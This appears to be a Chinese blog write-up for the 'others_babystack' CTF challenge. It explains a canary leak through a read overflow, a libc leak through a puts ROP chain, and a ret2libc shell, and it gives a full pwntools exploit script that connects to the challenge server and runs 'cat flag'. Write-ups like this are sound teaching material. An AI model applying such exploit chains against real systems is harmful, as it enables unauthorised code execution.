others_babystack

bamuwe發表於2024-03-16

others_babystack

  • Canary 保護
  • 程式控制流
  • 64位libc洩露
bamuwe@bamuwe:~/done/others_babystack$ checksec babystack
[*] '/home/bamuwe/done/others_babystack/babystack'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

程式開啟了Canary保護

image-20240127172338486

  1. 程式存在Canary保護,所以要先洩露出Canary
  2. read中存在溢位
  3. 透過read配合puts得到Canary的值
  4. 構造payload利用exit函式劫持程式流,洩露libc
  5. 構造payload得到shell
from pwn import *
from LibcSearcher import LibcSearcher
# context.log_level = 'debug'
# io = gdb.debug('./babystack')
io = remote('node5.buuoj.cn',29522)
elf = ELF('./babystack')
padding = cyclic(136)
pop_rdi_ret = 0x0000000000400a93
main_addr = 0x400908

def cmd(idx):
    io.sendlineafter(b'>>',str(idx))
def leak_canry():
    cmd(1)
    io.sendline(padding)
    cmd(2)
    io.recvuntil('\n')
    canary = u64(io.recv(7).rjust(8, b'\x00'))
    print(hex(canary))
    return canary
def leak_puts(canary):
    cmd(1)
    payload = padding+p64(canary)+p64(0x0)+p64(pop_rdi_ret)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main_addr)
    io.sendline(payload)
    cmd(3)
    puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
    print('puts_addr->',hex(puts_addr))
    return puts_addr
def pwn(puts_addr):
    libc = LibcSearcher('puts',puts_addr)
    lib_offset = puts_addr - libc.dump('puts')
    sys_addr = lib_offset+libc.dump('system')
    bin_sh_addr = lib_offset+libc.dump('str_bin_sh')
    payload = padding+p64(canary)+p64(0x0)+p64(pop_rdi_ret)+p64(bin_sh_addr)+p64(sys_addr)
    cmd(1)
    io.sendline(payload)
    cmd(3)
    io.sendline('cat flag')
    io.interactive()

canary = leak_canry()
puts_addr = leak_puts(canary)
pwn(puts_addr)

這裡面看佬的wp新學一招,使用cyclic(lengths)可以直接得到所需長度的迴圈字串